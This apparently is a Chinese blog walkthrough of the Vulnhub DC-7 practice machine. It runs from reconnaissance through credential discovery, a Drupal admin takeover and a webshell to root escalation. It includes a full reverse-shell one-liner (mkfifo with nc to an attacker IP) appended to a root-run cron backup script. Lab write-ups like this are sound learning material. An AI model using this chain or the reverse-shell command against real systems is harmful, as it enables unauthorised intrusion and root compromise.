Vulnhub靶机DC-7通关笔记

vulnhub

Word count: 271Reading time: 1 min

 2020/03/14   Share

Vulnhub靶机DC-7通关笔记

¶前言

下载地址：https://www.vulnhub.com/entry/dc-7,356/

upload successful

¶开始

nmap扫描

upload successful

开放了80和22

upload successful

各种扫描 Nday都试过了没用

看了wp提示关键在@DC7USER上

搜到了他的github

upload successful

看来这是要结合社工的

在config.php得到密码

upload successful

试一试用ssh登陆

upload successful

登陆上了

upload successful

mbox的内容

upload successful

好像是自动备份

drush引起了我的注意

https://blog.csdn.net/qq_15936309/article/details/86590353

upload successful
修改了admin的密码

upload successful
进入后台

upload successful

没有php插件是无法执行php代码的

安装一个php插件

upload successful

连上蚁剑

upload successful

backup.sh的权限是root 但是www-data用户可以修改他
并且backup.sh已经加入了计划任务
可以修改backup.sh得到反弹shell

upload successful

没执行
可能是目录权限问题

换一个

echo "mkfifo /tmp/iwxe; nc 192.168.3.55 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe">>backups.sh

upload successful
收到

upload successful

¶总结

这个靶机还挺难的没有想到要社工才有下一步的线索 drupal的后台getshell技巧又+1

Author：r0ckyzzz

原文链接：http://r0cky.xyz/2020/03/14/Vulnhub%E9%9D%B6%E6%9C%BADC-7%E9%80%9A%E5%85%B3%E7%AC%94%E8%AE%B0/

发表日期：March 14th 2020, 7:36:00 pm

更新日期：March 14th 2020, 7:38:47 pm

Next Post

Vulnhub靶机DC-8通关笔记
Previous Post

Vulnhub靶机DC-6通关笔记

CATALOG

1. Vulnhub靶机DC-7通关笔记

